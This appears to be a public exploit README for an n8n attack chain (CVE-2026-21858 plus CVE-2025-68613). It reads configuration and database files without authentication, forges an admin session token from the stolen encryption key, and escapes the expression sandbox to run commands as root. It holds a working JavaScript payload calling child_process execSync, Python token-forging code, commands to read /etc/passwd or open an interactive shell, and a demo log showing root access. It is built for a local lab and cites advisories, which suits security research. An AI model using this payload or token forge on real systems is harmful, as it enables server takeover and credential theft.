Share
## https://sploitus.com/exploit?id=DED883F5-2EC9-52D3-A8BD-77686FDCA027
# CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain

**Unauthenticated LFI โ†’ Admin Token Forge โ†’ Sandbox Bypass โ†’ RCE**

| | |
|---|---|
| **CVE** | CVE-2026-21858 (LFI) + CVE-2025-68613 (RCE) |
| **CVSS** | 10.0 + 9.9 (Critical) |
| **Affected** | n8n < 1.121.0 (LFI) / n8n 0.211.0 - 1.120.3 (RCE) |
| **Fixed** | 1.121.0 / 1.120.4+ |
| **Codename** | Ni8mare |
| **Credit** | Dor Attias (Cyera) |
| **Exploit** | [Chocapikk](https://github.com/Chocapikk/CVE-2026-21858) |

## TL;DR

Full unauthenticated RCE chain on n8n:

1. **CVE-2026-21858** - Content-Type confusion โ†’ LFI
2. Read config + database โ†’ forge admin JWT
3. **CVE-2025-68613** - Expression injection โ†’ sandbox bypass โ†’ RCE

## Attack Chain

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚                    UNAUTHENTICATED                          โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  1. LFI /proc/self/environ     โ†’ Find HOME directory        โ”‚
โ”‚  2. LFI $HOME/.n8n/config      โ†’ Get encryptionKey          โ”‚
โ”‚  3. LFI $HOME/.n8n/database.sqlite โ†’ Get admin credentials  โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚                    TOKEN FORGE                               โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  4. Derive JWT secret from encryptionKey                    โ”‚
โ”‚  5. Forge admin session cookie                               โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚                    AUTHENTICATED RCE                         โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  6. Create workflow with expression injection                โ”‚
โ”‚  7. Sandbox bypass via this.process.mainModule.require       โ”‚
โ”‚  8. Execute arbitrary commands as root                       โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

## CVE-2026-21858 - LFI via Content-Type Confusion

### The Patch

```
commit c8d604d2c466dd84ec24f4f092183d86e43f2518
Author: mfsiega
Date:   Thu Nov 13 11:51:40 2025 +0100

    Merge commit from fork
```

The legendary **"Merge commit from fork"** - when you see this, someone found something spicy. ๐ŸŒถ๏ธ

### Root Cause

```javascript
// BEFORE (vulnerable)
const files = (context.getBodyData().files as IDataObject) ?? {};
await context.nodeHelpers.copyBinaryFile(file.filepath, ...)

// AFTER (fixed)
a.ok(req.contentType === 'multipart/form-data', 'Expected multipart/form-data');
```

Send `Content-Type: application/json` โ†’ control `filepath` โ†’ read any file.

## CVE-2025-68613 - Expression Injection RCE

### The Payload

```javascript
={{ (function() { 
  var require = this.process.mainModule.require; 
  var execSync = require("child_process").execSync; 
  return execSync("id").toString(); 
})() }}
```

n8n expressions have access to `this.process.mainModule.require` โ†’ full sandbox escape.

### Token Forge

```python
# JWT secret derivation
jwt_secret = sha256(encryption_key[::2]).hexdigest()

# JWT hash
jwt_hash = b64encode(sha256(f"{email}:{password_hash}")).decode()[:10]

# Forge token
token = jwt.encode({"id": user_id, "hash": jwt_hash}, jwt_secret, "HS256")
```

## Lab Setup

```bash
docker compose up -d
# Wait ~60 seconds for setup
# Form: http://localhost:5678/form/vulnerable-form
# Creds: admin@exploit.local / password
```

## Usage

```bash
# Simple LFI
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --lfi /etc/passwd

# Full chain with command
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"

# Interactive shell
uv run python exploit.py http://localhost:5678 /form/vulnerable-form
```

## Demo

```
โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘     CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain          โ•‘
โ•‘     LFI โ†’ Token Forge โ†’ Sandbox Bypass โ†’ RCE                  โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

[*] Target: http://localhost:5678/form/vulnerable-form
[*] Version: 1.65.0 (VULN)
[x] HOME directory
[+] HOME directory: /root
[x] Encryption key
[+] Encryption key: yusrXZV1...
[x] Database
[+] Database: 1327104 bytes
[x] Admin user
[+] Admin user: admin@exploit.local
[x] Token forge
[+] Token forge: OK
[x] Admin access
[+] Admin access: GRANTED!
[+] Cookie: n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjljMWI5MzU0LTI5NzQtNGZlOS05OTc2LWVmZDM3ZWEyNWFlMiIsImhhc2giOiJGYzVQZjVkUDRxIn0.TrIjHV3_6pw6Syi4qme5larZeQElBJmo4Y_eSgL9_M0
[x] RCE
[+] RCE: OK

uid=0(root) gid=0(root) groups=0(root)
```

## References

- [GHSA-v4pr-fm98-w9pg](https://github.com/n8n-io/n8n/security/advisories/GHSA-v4pr-fm98-w9pg) - CVE-2026-21858
- [GHSA-v98v-ff95-f3cp](https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp) - CVE-2025-68613
- [Nuclei Template CVE-2025-68613](https://github.com/MuhamadJuwandi/nuclei-templates/blob/main/http/cves/2025/CVE-2025-68613.yaml)
- [Cyera Research - Ni8mare](https://thehackernews.com/2026/01/critical-n8n-vulnerability-cvss-100.html)